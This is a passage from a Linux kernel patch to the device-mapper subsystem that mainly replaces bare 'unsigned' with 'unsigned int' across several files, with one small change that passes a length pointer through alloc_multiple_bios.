+ 	while (wbl->size) {
+ 		wbl->size--;
+@@ -1880,7 +1880,7 @@ static void __writecache_writeback_ssd(struct dm_writecache *wc, struct writebac
+ 	struct copy_struct *c;
+ 
+ 	while (wbl->size) {
+-		unsigned n_sectors;
++		unsigned int n_sectors;
+ 
+ 		wbl->size--;
+ 		e = container_of(wbl->list.prev, struct wc_entry, lru);
+@@ -2092,7 +2092,7 @@ restart:
+ 	}
+ }
+ 
+-static int calculate_memory_size(uint64_t device_size, unsigned block_size,
++static int calculate_memory_size(uint64_t device_size, unsigned int block_size,
+ 				 size_t *n_blocks_p, size_t *n_metadata_blocks_p)
+ {
+ 	uint64_t n_blocks, offset;
+@@ -2207,12 +2207,12 @@ static void writecache_dtr(struct dm_target *ti)
+ 	kfree(wc);
+ }
+ 
+-static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int writecache_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_writecache *wc;
+ 	struct dm_arg_set as;
+ 	const char *string;
+-	unsigned opt_params;
++	unsigned int opt_params;
+ 	size_t offset, data_size;
+ 	int i, r;
+ 	char dummy;
+@@ -2419,7 +2419,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 				goto invalid_optional;
+ 			wc->autocommit_blocks_set = true;
+ 		} else if (!strcasecmp(string, "autocommit_time") && opt_params >= 1) {
+-			unsigned autocommit_msecs;
++			unsigned int autocommit_msecs;
+ 			string = dm_shift_arg(&as), opt_params--;
+ 			if (sscanf(string, "%u%c", &autocommit_msecs, &dummy) != 1)
+ 				goto invalid_optional;
+@@ -2429,7 +2429,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 			wc->autocommit_time_value = autocommit_msecs;
+ 			wc->autocommit_time_set = true;
+ 		} else if (!strcasecmp(string, "max_age") && opt_params >= 1) {
+-			unsigned max_age_msecs;
++			unsigned int max_age_msecs;
+ 			string = dm_shift_arg(&as), opt_params--;
+ 			if (sscanf(string, "%u%c", &max_age_msecs, &dummy) != 1)
+ 				goto invalid_optional;
+@@ -2454,7 +2454,7 @@ static int writecache_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 		} else if (!strcasecmp(string, "metadata_only")) {
+ 			wc->metadata_only = true;
+ 		} else if (!strcasecmp(string, "pause_writeback") && opt_params >= 1) {
+-			unsigned pause_msecs;
++			unsigned int pause_msecs;
+ 			if (WC_MODE_PMEM(wc))
+ 				goto invalid_optional;
+ 			string = dm_shift_arg(&as), opt_params--;
+@@ -2653,11 +2653,11 @@ bad:
+ }
+ 
+ static void writecache_status(struct dm_target *ti, status_type_t type,
+-			      unsigned status_flags, char *result, unsigned maxlen)
++			      unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_writecache *wc = ti->private;
+-	unsigned extra_args;
+-	unsigned sz = 0;
++	unsigned int extra_args;
++	unsigned int sz = 0;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 1b6c3c783a8eb..cdbf24def8af3 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -83,7 +83,7 @@ struct clone_info {
+ 	struct bio *bio;
+ 	struct dm_io *io;
+ 	sector_t sector;
+-	unsigned sector_count;
++	unsigned int sector_count;
+ 	bool is_abnormal_io:1;
+ 	bool submit_as_polled:1;
+ };
+@@ -111,7 +111,7 @@ struct bio *dm_bio_from_per_bio_data(void *data, size_t data_size)
+ }
+ EXPORT_SYMBOL_GPL(dm_bio_from_per_bio_data);
+ 
+-unsigned dm_bio_get_target_bio_nr(const struct bio *bio)
++unsigned int dm_bio_get_target_bio_nr(const struct bio *bio)
+ {
+ 	return container_of(bio, struct dm_target_io, clone)->target_bio_nr;
+ }
+@@ -142,7 +142,7 @@ struct table_device {
+  * Bio-based DM's mempools' reserved IOs set by the user.
+  */
+ #define RESERVED_BIO_BASED_IOS		16
+-static unsigned reserved_bio_based_ios = RESERVED_BIO_BASED_IOS;
++static unsigned int reserved_bio_based_ios = RESERVED_BIO_BASED_IOS;
+ 
+ static int __dm_get_module_param_int(int *module_param, int min, int max)
+ {
+@@ -165,11 +165,10 @@ static int __dm_get_module_param_int(int *module_param, int min, int max)
+ 	return param;
+ }
+ 
+-unsigned __dm_get_module_param(unsigned *module_param,
+-			       unsigned def, unsigned max)
++unsigned int __dm_get_module_param(unsigned int *module_param, unsigned int def, unsigned int max)
+ {
+-	unsigned param = READ_ONCE(*module_param);
+-	unsigned modified_param = 0;
++	unsigned int param = READ_ONCE(*module_param);
++	unsigned int modified_param = 0;
+ 
+ 	if (!param)
+ 		modified_param = def;
+@@ -184,14 +183,14 @@ unsigned __dm_get_module_param(unsigned *module_param,
+ 	return param;
+ }
+ 
+-unsigned dm_get_reserved_bio_based_ios(void)
++unsigned int dm_get_reserved_bio_based_ios(void)
+ {
+ 	return __dm_get_module_param(&reserved_bio_based_ios,
+ 				     RESERVED_BIO_BASED_IOS, DM_RESERVED_MAX_IOS);
+ }
+ EXPORT_SYMBOL_GPL(dm_get_reserved_bio_based_ios);
+ 
+-static unsigned dm_get_numa_node(void)
++static unsigned int dm_get_numa_node(void)
+ {
+ 	return __dm_get_module_param_int(&dm_numa_node,
+ 					 DM_NUMA_NODE, num_online_nodes() - 1);
+@@ -603,7 +602,7 @@ static void free_io(struct dm_io *io)
+ }
+ 
+ static struct bio *alloc_tio(struct clone_info *ci, struct dm_target *ti,
+-			     unsigned target_bio_nr, unsigned *len, gfp_t gfp_mask)
++			     unsigned int target_bio_nr, unsigned int *len, gfp_t gfp_mask)
+ {
+ 	struct mapped_device *md = ci->io->md;
+ 	struct dm_target_io *tio;
+@@ -1314,11 +1313,11 @@ out:
+  * the partially processed part (the sum of regions 1+2) must be the same for all
+  * copies of the bio.
+  */
+-void dm_accept_partial_bio(struct bio *bio, unsigned n_sectors)
++void dm_accept_partial_bio(struct bio *bio, unsigned int n_sectors)
+ {
+ 	struct dm_target_io *tio = clone_to_tio(bio);
+ 	struct dm_io *io = tio->io;
+-	unsigned bio_sectors = bio_sectors(bio);
++	unsigned int bio_sectors = bio_sectors(bio);
+ 
+ 	BUG_ON(dm_tio_flagged(tio, DM_TIO_IS_DUPLICATE_BIO));
+ 	BUG_ON(op_is_zone_mgmt(bio_op(bio)));
+@@ -1447,7 +1446,7 @@ static void __map_bio(struct bio *clone)
+ 	}
+ }
+ 
+-static void setup_split_accounting(struct clone_info *ci, unsigned len)
++static void setup_split_accounting(struct clone_info *ci, unsigned int len)
+ {
+ 	struct dm_io *io = ci->io;
+ 
+@@ -1463,7 +1462,8 @@ static void setup_split_accounting(struct clone_info *ci, unsigned len)
+ }
+ 
+ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+-				struct dm_target *ti, unsigned num_bios)
++				struct dm_target *ti, unsigned int num_bios,
++				unsigned *len)
+ {
+ 	struct bio *bio;
+ 	int try;
+@@ -1474,7 +1474,7 @@ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+ 		if (try)
+ 			mutex_lock(&ci->io->md->table_devices_lock);
+ 		for (bio_nr = 0; bio_nr < num_bios; bio_nr++) {
+-			bio = alloc_tio(ci, ti, bio_nr, NULL,
++			bio = alloc_tio(ci, ti, bio_nr, len,
+ 					try ? GFP_NOIO : GFP_NOWAIT);
+ 			if (!bio)
+ 				break;
+@@ -1492,7 +1492,7 @@ static void alloc_multiple_bios(struct bio_list *blist, struct clone_info *ci,
+ }
+ 
+ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+-				 unsigned int num_bios, unsigned *len)
++				 unsigned int num_bios, unsigned int *len)
+ {
+ 	struct bio_list blist = BIO_EMPTY_LIST;
+ 	struct bio *clone;
+@@ -1512,7 +1512,7 @@ static int __send_duplicate_bios(struct clone_info *ci, struct dm_target *ti,
+ 		if (len)
+ 			setup_split_accounting(ci, *len);
+ 		/* dm_accept_partial_bio() is not supported with shared tio->len_ptr */
+-		alloc_multiple_bios(&blist, ci, ti, num_bios);
++		alloc_multiple_bios(&blist, ci, ti, num_bios, len);
+ 		while ((clone = bio_list_pop(&blist))) {
+ 			dm_tio_set_flag(clone_to_tio(clone), DM_TIO_IS_DUPLICATE_BIO);
+ 			__map_bio(clone);
+@@ -1560,10 +1560,9 @@ static void __send_empty_flush(struct clone_info *ci)
+ }
+ 
+ static void __send_changing_extent_only(struct clone_info *ci, struct dm_target *ti,
+-					unsigned num_bios)
++					unsigned int num_bios)
+ {
+-	unsigned len;
+-	unsigned int bios;
++	unsigned int len, bios;
+ 
+ 	len = min_t(sector_t, ci->sector_count,
+ 		    max_io_len_target_boundary(ti, dm_target_offset(ti, ci->sector)));
+@@ -1601,7 +1600,7 @@ static bool is_abnormal_io(struct bio *bio)
+ static blk_status_t __process_abnormal_io(struct clone_info *ci,
+ 					  struct dm_target *ti)
+ {
+-	unsigned num_bios = 0;
++	unsigned int num_bios = 0;
+ 
+ 	switch (bio_op(ci->bio)) {
+ 	case REQ_OP_DISCARD:
+@@ -1679,7 +1678,7 @@ static blk_status_t __split_and_process_bio(struct clone_info *ci)
+ {
+ 	struct bio *clone;
+ 	struct dm_target *ti;
+-	unsigned len;
++	unsigned int len;
+ 
+ 	ti = dm_table_find_target(ci->map, ci->sector);
+ 	if (unlikely(!ti))
+@@ -2376,7 +2375,7 @@ out_undo_holders:
+ struct mapped_device *dm_get_md(dev_t dev)
+ {
+ 	struct mapped_device *md;
+-	unsigned minor = MINOR(dev);
++	unsigned int minor = MINOR(dev);
+ 
+ 	if (MAJOR(dev) != _major || minor >= (1 << MINORBITS))
+ 		return NULL;
+@@ -2659,7 +2658,7 @@ static void unlock_fs(struct mapped_device *md)
+  * are being added to md->deferred list.
+  */
+ static int __dm_suspend(struct mapped_device *md, struct dm_table *map,
+-			unsigned suspend_flags, unsigned int task_state,
++			unsigned int suspend_flags, unsigned int task_state,
+ 			int dmf_suspended_flag)
+ {
+ 	bool do_lockfs = suspend_flags & DM_SUSPEND_LOCKFS_FLAG;
+@@ -2766,7 +2765,7 @@ static int __dm_suspend(struct mapped_device *md, struct dm_table *map,
+  *
+  * To abort suspend, start the request_queue.
+  */
+-int dm_suspend(struct mapped_device *md, unsigned suspend_flags)
++int dm_suspend(struct mapped_device *md, unsigned int suspend_flags)
+ {
+ 	struct dm_table *map = NULL;
+ 	int r = 0;
+@@ -2868,7 +2867,7 @@ out:
+  * It may be used only from the kernel.
+  */
+ 
+-static void __dm_internal_suspend(struct mapped_device *md, unsigned suspend_flags)
++static void __dm_internal_suspend(struct mapped_device *md, unsigned int suspend_flags)
+ {
+ 	struct dm_table *map = NULL;
+ 
+@@ -2970,10 +2969,10 @@ EXPORT_SYMBOL_GPL(dm_internal_resume_fast);
+  * Event notification.
+  *---------------------------------------------------------------*/
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie, bool need_resize_uevent)
++		      unsigned int cookie, bool need_resize_uevent)
+ {
+ 	int r;
+-	unsigned noio_flag;
++	unsigned int noio_flag;
+ 	char udev_cookie[DM_COOKIE_LENGTH];
+ 	char *envp[3] = { NULL, NULL, NULL };
+ 	char **envpp = envp;
+diff --git a/drivers/md/dm.h b/drivers/md/dm.h
+index a9a3ffcad084c..a7917df09cafb 100644
+--- a/drivers/md/dm.h
++++ b/drivers/md/dm.h
+@@ -203,7 +203,7 @@ int dm_get_table_device(struct mapped_device *md, dev_t dev, fmode_t mode,
+ void dm_put_table_device(struct mapped_device *md, struct dm_dev *d);
+ 
+ int dm_kobject_uevent(struct mapped_device *md, enum kobject_action action,
+-		      unsigned cookie, bool need_resize_uevent);
++		      unsigned int cookie, bool need_resize_uevent);
+ 
+ void dm_internal_suspend(struct mapped_device *md);
+ void dm_internal_resume(struct mapped_device *md);
+@@ -222,6 +222,6 @@ void dm_free_md_mempools(struct dm_md_mempools *pools);
+ /*
+  * Various helpers
+  */
+-unsigned dm_get_reserved_bio_based_ios(void);
++unsigned int dm_get_reserved_bio_based_ios(void);
+ 
+ #endif
+diff --git a/drivers/md/persistent-data/dm-array.c b/drivers/md/persistent-data/dm-array.c
+index 3a963d783a865..eff9b41869f29 100644
+--- a/drivers/md/persistent-data/dm-array.c
++++ b/drivers/md/persistent-data/dm-array.c
+@@ -68,8 +68,8 @@ static int array_block_check(struct dm_block_validator *v,
+ 					       CSUM_XOR));
+ 	if (csum_disk != bh_le->csum) {
+ 		DMERR_LIMIT("array_block_check failed: csum %u != wanted %u",
+-			    (unsigned) le32_to_cpu(csum_disk),
+-			    (unsigned) le32_to_cpu(bh_le->csum));
++			    (unsigned int) le32_to_cpu(csum_disk),
++			    (unsigned int) le32_to_cpu(bh_le->csum));
+ 		return -EILSEQ;
+ 	}
+ 
+@@ -94,7 +94,7 @@ static struct dm_block_validator array_validator = {
+  * index - The index into _this_ specific block.
+  */
+ static void *element_at(struct dm_array_info *info, struct array_block *ab,
+-			unsigned index)
++			unsigned int index)
+ {
+ 	unsigned char *entry = (unsigned char *) (ab + 1);
+ 
+@@ -108,9 +108,9 @@ static void *element_at(struct dm_array_info *info, struct array_block *ab,
+  * in an array block.
+  */
+ static void on_entries(struct dm_array_info *info, struct array_block *ab,
+-		       void (*fn)(void *, const void *, unsigned))
++		       void (*fn)(void *, const void *, unsigned int))
+ {
+-	unsigned nr_entries = le32_to_cpu(ab->nr_entries);
++	unsigned int nr_entries = le32_to_cpu(ab->nr_entries);
+ 	fn(info->value_type.context, element_at(info, ab, 0), nr_entries);
+ }
+ 
+@@ -171,7 +171,7 @@ static int alloc_ablock(struct dm_array_info *info, size_t size_of_block,
+  * the current number of entries.
+  */
+ static void fill_ablock(struct dm_array_info *info, struct array_block *ab,
+-			const void *value, unsigned new_nr)
++			const void *value, unsigned int new_nr)
+ {
+ 	uint32_t nr_entries, delta, i;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+@@ -194,7 +194,7 @@ static void fill_ablock(struct dm_array_info *info, struct array_block *ab,
+  * entries.
+  */
+ static void trim_ablock(struct dm_array_info *info, struct array_block *ab,
+-			unsigned new_nr)
++			unsigned int new_nr)
+ {
+ 	uint32_t nr_entries, delta;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+@@ -247,7 +247,7 @@ static void unlock_ablock(struct dm_array_info *info, struct dm_block *block)
+  * / max_entries).
+  */
+ static int lookup_ablock(struct dm_array_info *info, dm_block_t root,
+-			 unsigned index, struct dm_block **block,
++			 unsigned int index, struct dm_block **block,
+ 			 struct array_block **ab)
+ {
+ 	int r;
+@@ -295,7 +295,7 @@ static int __shadow_ablock(struct dm_array_info *info, dm_block_t b,
+  * The shadow op will often be a noop.  Only insert if it really
+  * copied data.
+  */
+-static int __reinsert_ablock(struct dm_array_info *info, unsigned index,
++static int __reinsert_ablock(struct dm_array_info *info, unsigned int index,
+ 			     struct dm_block *block, dm_block_t b,
+ 			     dm_block_t *root)
+ {
+@@ -321,7 +321,7 @@ static int __reinsert_ablock(struct dm_array_info *info, unsigned index,
+  * for both the current root block, and the new one.
+  */
+ static int shadow_ablock(struct dm_array_info *info, dm_block_t *root,
+-			 unsigned index, struct dm_block **block,
++			 unsigned int index, struct dm_block **block,
+ 			 struct array_block **ab)
+ {
+ 	int r;
+@@ -346,7 +346,7 @@ static int shadow_ablock(struct dm_array_info *info, dm_block_t *root,
+  */
+ static int insert_new_ablock(struct dm_array_info *info, size_t size_of_block,
+ 			     uint32_t max_entries,
+-			     unsigned block_index, uint32_t nr,
++			     unsigned int block_index, uint32_t nr,
+ 			     const void *value, dm_block_t *root)
+ {
+ 	int r;
+@@ -365,8 +365,8 @@ static int insert_new_ablock(struct dm_array_info *info, size_t size_of_block,
+ }
+ 
+ static int insert_full_ablocks(struct dm_array_info *info, size_t size_of_block,
+-			       unsigned begin_block, unsigned end_block,
+-			       unsigned max_entries, const void *value,
++			       unsigned int begin_block, unsigned int end_block,
++			       unsigned int max_entries, const void *value,
+ 			       dm_block_t *root)
+ {
+ 	int r = 0;
+@@ -402,20 +402,20 @@ struct resize {
+ 	/*
+ 	 * Maximum nr entries in an array block.
+ 	 */
+-	unsigned max_entries;
++	unsigned int max_entries;
+ 
+ 	/*
+ 	 * nr of completely full blocks in the array.
+ 	 *
+ 	 * 'old' refers to before the resize, 'new' after.
+ 	 */
+-	unsigned old_nr_full_blocks, new_nr_full_blocks;
++	unsigned int old_nr_full_blocks, new_nr_full_blocks;
+ 
+ 	/*
+ 	 * Number of entries in the final block.  0 iff only full blocks in
+ 	 * the array.
+ 	 */
+-	unsigned old_nr_entries_in_last_block, new_nr_entries_in_last_block;
++	unsigned int old_nr_entries_in_last_block, new_nr_entries_in_last_block;
+ 
+ 	/*
+ 	 * The default value used when growing the array.
+@@ -430,8 +430,8 @@ struct resize {
+  * begin_index - the index of the first array block to remove.
+  * end_index - the one-past-the-end value.  ie. this block is not removed.
+  */
+-static int drop_blocks(struct resize *resize, unsigned begin_index,
+-		       unsigned end_index)
++static int drop_blocks(struct resize *resize, unsigned int begin_index,
++		       unsigned int end_index)
+ {
+ 	int r;
+ 
+@@ -449,8 +449,8 @@ static int drop_blocks(struct resize *resize, unsigned begin_index,
+ /*
+  * Calculates how many blocks are needed for the array.
+  */
+-static unsigned total_nr_blocks_needed(unsigned nr_full_blocks,
+-				       unsigned nr_entries_in_last_block)
++static unsigned int total_nr_blocks_needed(unsigned int nr_full_blocks,
++				       unsigned int nr_entries_in_last_block)
+ {
+ 	return nr_full_blocks + (nr_entries_in_last_block ? 1 : 0);
+ }
+@@ -461,7 +461,7 @@ static unsigned total_nr_blocks_needed(unsigned nr_full_blocks,
+ static int shrink(struct resize *resize)
+ {
+ 	int r;
+-	unsigned begin, end;
++	unsigned int begin, end;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 
+@@ -527,7 +527,7 @@ static int grow_add_tail_block(struct resize *resize)
+ static int grow_needs_more_blocks(struct resize *resize)
+ {
+ 	int r;
+-	unsigned old_nr_blocks = resize->old_nr_full_blocks;
++	unsigned int old_nr_blocks = resize->old_nr_full_blocks;
+ 
+ 	if (resize->old_nr_entries_in_last_block > 0) {
+ 		old_nr_blocks++;
+@@ -569,11 +569,11 @@ static int grow(struct resize *resize)
+  * These are the value_type functions for the btree elements, which point
+  * to array blocks.
+  */
+-static void block_inc(void *context, const void *value, unsigned count)
++static void block_inc(void *context, const void *value, unsigned int count)
+ {
+ 	const __le64 *block_le = value;
+ 	struct dm_array_info *info = context;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, block_le++)
+ 		dm_tm_inc(info->btree_info.tm, le64_to_cpu(*block_le));
+@@ -618,9 +618,9 @@ static void __block_dec(void *context, const void *value)
+ 	dm_tm_dec(info->btree_info.tm, b);
+ }
+ 
+-static void block_dec(void *context, const void *value, unsigned count)
++static void block_dec(void *context, const void *value, unsigned int count)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < count; i++, value += sizeof(__le64))
+ 		__block_dec(context, value);
+ }
+@@ -700,10 +700,11 @@ int dm_array_resize(struct dm_array_info *info, dm_block_t root,
+ EXPORT_SYMBOL_GPL(dm_array_resize);
+ 
+ static int populate_ablock_with_values(struct dm_array_info *info, struct array_block *ab,
+-				       value_fn fn, void *context, unsigned base, unsigned new_nr)
++				       value_fn fn, void *context,
++				       unsigned int base, unsigned int new_nr)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+ 
+ 	BUG_ON(le32_to_cpu(ab->nr_entries));
+@@ -728,7 +729,7 @@ int dm_array_new(struct dm_array_info *info, dm_block_t *root,
+ 	int r;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+-	unsigned block_index, end_block, size_of_block, max_entries;
++	unsigned int block_index, end_block, size_of_block, max_entries;
+ 
+ 	r = dm_array_empty(info, root);
+ 	if (r)
+@@ -776,7 +777,7 @@ int dm_array_get_value(struct dm_array_info *info, dm_block_t root,
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 	size_t size_of_block;
+-	unsigned entry, max_entries;
++	unsigned int entry, max_entries;
+ 
+ 	size_of_block = dm_bm_block_size(dm_tm_get_bm(info->btree_info.tm));
+ 	max_entries = calc_max_entries(info->value_type.size, size_of_block);
+@@ -804,8 +805,8 @@ static int array_set_value(struct dm_array_info *info, dm_block_t root,
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 	size_t size_of_block;
+-	unsigned max_entries;
+-	unsigned entry;
++	unsigned int max_entries;
++	unsigned int entry;
+ 	void *old_value;
+ 	struct dm_btree_value_type *vt = &info->value_type;
+ 
+@@ -861,9 +862,9 @@ static int walk_ablock(void *context, uint64_t *keys, void *leaf)
+ 	struct walk_info *wi = context;
+ 
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	__le64 block_le;
+-	unsigned nr_entries, max_entries;
++	unsigned int nr_entries, max_entries;
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+ 
+diff --git a/drivers/md/persistent-data/dm-array.h b/drivers/md/persistent-data/dm-array.h
+index d7d2d579c662c..b6c7077c73591 100644
+--- a/drivers/md/persistent-data/dm-array.h
++++ b/drivers/md/persistent-data/dm-array.h
+@@ -198,7 +198,7 @@ struct dm_array_cursor {
+ 
+ 	struct dm_block *block;
+ 	struct array_block *ab;
+-	unsigned index;
++	unsigned int index;
+ };
+ 
+ int dm_array_cursor_begin(struct dm_array_info *info,
+diff --git a/drivers/md/persistent-data/dm-bitset.c b/drivers/md/persistent-data/dm-bitset.c
+index b7208d82e748a..625d93498cddb 100644
+--- a/drivers/md/persistent-data/dm-bitset.c
++++ b/drivers/md/persistent-data/dm-bitset.c
+@@ -41,7 +41,7 @@ EXPORT_SYMBOL_GPL(dm_bitset_empty);
+ 
+ struct packer_context {
+ 	bit_value_fn fn;
+-	unsigned nr_bits;
++	unsigned int nr_bits;
+ 	void *context;
+ };
+ 
+@@ -49,7 +49,7 @@ static int pack_bits(uint32_t index, void *value, void *context)
+ {
+ 	int r;
+ 	struct packer_context *p = context;
+-	unsigned bit, nr = min(64u, p->nr_bits - (index * 64));
++	unsigned int bit, nr = min(64u, p->nr_bits - (index * 64));
+ 	uint64_t word = 0;
+ 	bool bv;
+ 
+@@ -147,7 +147,7 @@ static int get_array_entry(struct dm_disk_bitset *info, dm_block_t root,
+ 			   uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned array_index = index / BITS_PER_ARRAY_ENTRY;
++	unsigned int array_index = index / BITS_PER_ARRAY_ENTRY;
+ 
+ 	if (info->current_index_set) {
+ 		if (info->current_index == array_index)
+@@ -165,7 +165,7 @@ int dm_bitset_set_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 		      uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+@@ -182,7 +182,7 @@ int dm_bitset_clear_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 			uint32_t index, dm_block_t *new_root)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+@@ -199,7 +199,7 @@ int dm_bitset_test_bit(struct dm_disk_bitset *info, dm_block_t root,
+ 		       uint32_t index, dm_block_t *new_root, bool *result)
+ {
+ 	int r;
+-	unsigned b = index % BITS_PER_ARRAY_ENTRY;
++	unsigned int b = index % BITS_PER_ARRAY_ENTRY;
+ 
+ 	r = get_array_entry(info, root, index, new_root);
+ 	if (r)
+diff --git a/drivers/md/persistent-data/dm-block-manager.c b/drivers/md/persistent-data/dm-block-manager.c
+index 11935864f50f5..1f40100908d7c 100644
+--- a/drivers/md/persistent-data/dm-block-manager.c
++++ b/drivers/md/persistent-data/dm-block-manager.c
+@@ -57,10 +57,10 @@ struct waiter {
+ 	int wants_write;
+ };
+ 
+-static unsigned __find_holder(struct block_lock *lock,
++static unsigned int __find_holder(struct block_lock *lock,
+ 			      struct task_struct *task)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < MAX_HOLDERS; i++)
+ 		if (lock->holders[i] == task)
+@@ -73,7 +73,7 @@ static unsigned __find_holder(struct block_lock *lock,
+ /* call this *after* you increment lock->count */
+ static void __add_holder(struct block_lock *lock, struct task_struct *task)
+ {
+-	unsigned h = __find_holder(lock, NULL);
++	unsigned int h = __find_holder(lock, NULL);
+ #ifdef CONFIG_DM_DEBUG_BLOCK_STACK_TRACING
+ 	struct stack_store *t;
+ #endif
+@@ -90,14 +90,14 @@ static void __add_holder(struct block_lock *lock, struct task_struct *task)
+ /* call this *before* you decrement lock->count */
+ static void __del_holder(struct block_lock *lock, struct task_struct *task)
+ {
+-	unsigned h = __find_holder(lock, task);
++	unsigned int h = __find_holder(lock, task);
+ 	lock->holders[h] = NULL;
+ 	put_task_struct(task);
+ }
+ 
+ static int __check_holder(struct block_lock *lock)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < MAX_HOLDERS; i++) {
+ 		if (lock->holders[i] == current) {
+@@ -376,8 +376,8 @@ struct dm_block_manager {
+ };
+ 
+ struct dm_block_manager *dm_block_manager_create(struct block_device *bdev,
+-						 unsigned block_size,
+-						 unsigned max_held_per_thread)
++						 unsigned int block_size,
++						 unsigned int max_held_per_thread)
+ {
+ 	int r;
+ 	struct dm_block_manager *bm;
+@@ -415,7 +415,7 @@ void dm_block_manager_destroy(struct dm_block_manager *bm)
+ }
+ EXPORT_SYMBOL_GPL(dm_block_manager_destroy);
+ 
+-unsigned dm_bm_block_size(struct dm_block_manager *bm)
++unsigned int dm_bm_block_size(struct dm_block_manager *bm)
+ {
+ 	return dm_bufio_get_block_size(bm->bufio);
+ }
+diff --git a/drivers/md/persistent-data/dm-block-manager.h b/drivers/md/persistent-data/dm-block-manager.h
+index e728937f376a3..58a23b8ec1902 100644
+--- a/drivers/md/persistent-data/dm-block-manager.h
++++ b/drivers/md/persistent-data/dm-block-manager.h
+@@ -32,11 +32,11 @@ void *dm_block_data(struct dm_block *b);
+  */
+ struct dm_block_manager;
+ struct dm_block_manager *dm_block_manager_create(
+-	struct block_device *bdev, unsigned block_size,
+-	unsigned max_held_per_thread);
++	struct block_device *bdev, unsigned int block_size,
++	unsigned int max_held_per_thread);
+ void dm_block_manager_destroy(struct dm_block_manager *bm);
+ 
+-unsigned dm_bm_block_size(struct dm_block_manager *bm);
++unsigned int dm_bm_block_size(struct dm_block_manager *bm);
+ dm_block_t dm_bm_nr_blocks(struct dm_block_manager *bm);
+ 
+ /*----------------------------------------------------------------*/
+diff --git a/drivers/md/persistent-data/dm-btree-remove.c b/drivers/md/persistent-data/dm-btree-remove.c
+index 4ead31e0d8ce5..ac213138b0217 100644
+--- a/drivers/md/persistent-data/dm-btree-remove.c
++++ b/drivers/md/persistent-data/dm-btree-remove.c
+@@ -124,10 +124,10 @@ static int node_copy(struct btree_node *left, struct btree_node *right, int shif
+ /*
+  * Delete a specific entry from a leaf node.
+  */
+-static void delete_at(struct btree_node *n, unsigned index)
++static void delete_at(struct btree_node *n, unsigned int index)
+ {
+-	unsigned nr_entries = le32_to_cpu(n->header.nr_entries);
+-	unsigned nr_to_copy = nr_entries - (index + 1);
++	unsigned int nr_entries = le32_to_cpu(n->header.nr_entries);
++	unsigned int nr_to_copy = nr_entries - (index + 1);
+ 	uint32_t value_size = le32_to_cpu(n->header.value_size);
+ 	BUG_ON(index >= nr_entries);
+ 
+@@ -144,20 +144,20 @@ static void delete_at(struct btree_node *n, unsigned index)
+ 	n->header.nr_entries = cpu_to_le32(nr_entries - 1);
+ }
+ 
+-static unsigned merge_threshold(struct btree_node *n)
++static unsigned int merge_threshold(struct btree_node *n)
+ {
+ 	return le32_to_cpu(n->header.max_entries) / 3;
+ }
+ 
+ struct child {
+-	unsigned index;
++	unsigned int index;
+ 	struct dm_block *block;
+ 	struct btree_node *n;
+ };
+ 
+ static int init_child(struct dm_btree_info *info, struct dm_btree_value_type *vt,
+ 		      struct btree_node *parent,
+-		      unsigned index, struct child *result)
++		      unsigned int index, struct child *result)
+ {
+ 	int r, inc;
+ 	dm_block_t root;
+@@ -263,7 +263,7 @@ static int __rebalance2(struct dm_btree_info *info, struct btree_node *parent,
+ 		/*
+ 		 * Rebalance.
+ 		 */
+-		unsigned target_left = (nr_left + nr_right) / 2;
++		unsigned int target_left = (nr_left + nr_right) / 2;
+ 		ret = shift(left, right, nr_left - target_left);
+ 		if (ret)
+ 			return ret;
+@@ -273,7 +273,7 @@ static int __rebalance2(struct dm_btree_info *info, struct btree_node *parent,
+ }
+ 
+ static int rebalance2(struct shadow_spine *s, struct dm_btree_info *info,
+-		      struct dm_btree_value_type *vt, unsigned left_index)
++		      struct dm_btree_value_type *vt, unsigned int left_index)
+ {
+ 	int r;
+ 	struct btree_node *parent;
+@@ -310,7 +310,7 @@ static int delete_center_node(struct dm_btree_info *info, struct btree_node *par
+ 			      uint32_t nr_left, uint32_t nr_center, uint32_t nr_right)
+ {
+ 	uint32_t max_entries = le32_to_cpu(left->header.max_entries);
+-	unsigned shift = min(max_entries - nr_left, nr_center);
++	unsigned int shift = min(max_entries - nr_left, nr_center);
+ 
+ 	if (nr_left + shift > max_entries) {
+ 		DMERR("node shift out of bounds");
+@@ -351,10 +351,10 @@ static int redistribute3(struct dm_btree_info *info, struct btree_node *parent,
+ {
+ 	int s, ret;
